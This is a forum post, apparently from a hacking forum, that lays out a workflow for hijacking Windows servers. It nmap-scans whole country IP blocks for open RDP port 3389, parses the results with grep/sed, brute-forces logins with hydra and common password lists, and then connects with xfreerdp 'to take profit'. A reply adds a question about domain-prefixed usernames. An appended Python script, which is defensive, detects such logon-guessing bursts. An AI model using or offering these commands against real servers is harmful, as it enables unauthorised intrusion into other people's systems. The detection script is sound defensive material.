Article Looking for the best algorithm for catching dedicated servers 2018

CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // My experience in capturing dedicated servers

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Wrap up next few rows in script, create a few txt files

http://www.ipdeny.com/ipblocks/ - here you can look at IP block lists for the country that interests you, but if you scan them all at one time you will see the results only next year.
So don't be greedy and scan a small subnet of interest, keeping a journal and writing down the scanned ranges.

Code:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv

CREATE PARSER FILE (to select only OK IP's list): // create a sorting machine which will extract ip's with opened RDP port

Code:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d >> $p/openedServers.txt
rm $p/scanGhostFile.txt

PUT HYDRA COMMAND (Best 4 Brute on Linux or use Metasploit experience): // nothing funnier than hydra was found, crowbar gives misses and stunnes,
so upload a few top ten dictionaries (admin - password). Hydra is good because it does not load the processor so much and can brute all day, all night without pause.
The best solution I think is to exploit sorted IPs with the help of Metasploit, but it is a theme for another article because I do not see fast and standard solutions for this.

Code:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp

TO CONTROL REMOTE DESKTOP : // enter to exploited shells and take profit

Code:
xfreerdp /u:LOGIN /p:PASSWORD /v:IP:3389

Good Luck and feel free to comment.
We are anonysts we are Legion.



source: Looking for the best algorithm for capturing dedicated servers in 2K18

sec13b

18.05.2023
And if trying to use creds that contained the Windows domain prepended to the username?
Code:
ecorp\denis or ecorp\\denis
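
Seen from the defended host, the workflow in this thread is a burst of failed logons from one source across several account names, sometimes followed by a success. The following Python is an added example, not part of either post: it flags that pattern and treats `ecorp\denis`, `ecorp\\denis` and `denis@...` as one account. The log layout (time, Windows event ID 4625 failed / 4624 successful logon, user, source IP), the thresholds, the function names and the sample records are assumptions constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not from the page): time, event ID, user, source IP.
# 4625 = failed logon, 4624 = successful logon in the Windows Security log.
SAMPLE = r"""
2023-05-18T10:00:01 4625 admin 203.0.113.7
2023-05-18T10:00:02 4625 ecorp\denis 203.0.113.7
2023-05-18T10:00:03 4625 ECORP\\denis 203.0.113.7
2023-05-18T10:00:04 4625 administrator 203.0.113.7
2023-05-18T10:00:05 4625 user 203.0.113.7
2023-05-18T10:00:06 4625 denis@ecorp.example 203.0.113.7
2023-05-18T10:00:09 4624 denis 203.0.113.7
2023-05-18T10:05:00 4625 alice 198.51.100.20
2023-05-18T11:30:00 4624 alice 198.51.100.20
"""

def account(name):
    # Reduce DOMAIN\user, DOMAIN\\user and user@domain to a bare lowercase name,
    # so every spelling of one account is correlated with its eventual logon.
    name = name.split("@", 1)[0]
    return name.rsplit("\\", 1)[-1].lower()

def detect(lines, window=timedelta(minutes=5), min_fail=5, min_accounts=3):
    fails = defaultdict(list)   # source IP -> [(time, account)] failures inside window
    flagged, alerts = set(), []  # a flagged source stays flagged for the whole run
    for line in lines:
        ts, event, user, src = line.split()
        ts, acct = datetime.fromisoformat(ts), account(user)
        fails[src] = [(t, a) for t, a in fails[src] if ts - t <= window]
        if event == "4625":
            fails[src].append((ts, acct))
            accounts = {a for _, a in fails[src]}
            if (src not in flagged and len(fails[src]) >= min_fail
                    and len(accounts) >= min_accounts):
                flagged.add(src)
                alerts.append(("guessing", src, len(fails[src]), len(accounts)))
        elif event == "4624" and src in flagged:
            # A success from a source already seen guessing: treat the account as exposed.
            alerts.append(("success_after_guessing", src, acct))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE.strip().splitlines()):
        print(alert)
```

The second alert type is the one that warrants an immediate password reset and session review; the single mistyped password from 198.51.100.20 followed by a normal logon raises nothing.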
 